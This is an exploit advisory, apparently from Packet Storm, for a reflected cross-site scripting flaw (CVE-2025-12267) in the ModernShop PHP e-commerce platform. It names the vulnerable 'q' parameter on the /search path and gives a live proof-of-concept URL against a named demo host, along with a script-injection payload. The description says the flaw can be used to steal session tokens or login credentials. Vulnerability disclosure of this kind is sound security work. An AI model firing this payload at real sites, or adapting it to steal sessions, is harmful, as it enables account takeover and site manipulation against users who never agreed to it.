Share
## https://sploitus.com/exploit?id=PACKETSTORM:210934
# Exploit Title: ModernShop - RXSS
    # Exploit Author: CraCkEr
    # Date: 11-10-2025
    # Author of Script: ABHIRAM B
    # Vendor: ABHI CODE BOX
    # Vendor Homepage: https://www.codester.com/items/comments/58847/modern-shop-php-ecommerce-platform
    # Software Link: https://modernshop.apps.5g.in/
    # Demo Link: https://modernshop.apps.5g.in/
    # Tested on: Windows 11 Pro
    # Impact: Manipulate the content of the site
    # CWE: CWE-79 - CWE-74 - CWE-707
    # VDP: VDB-329939
    # CVE: CVE-2025-12267
    
    ## Description
    
    Attacker can send to victim a link containing a malicious URL in an email or instant message
    can perform a wide variety of actions, such as stealing the victim's session token or login credentials
    
    
    Path:
    
    /search
    
    
    GET parameter 'q' is vulnerable to XSS
    
    
    Live POC:
    
    https://modernshop.apps.5g.in/search?q=1bwkni%3e%3cscript%3ealert(1)%3c%2fscript%3ehu1c6
    
    Payload:
    
    bwkni><script>alert(1)</script>hu1c6
    
    
    [-] Done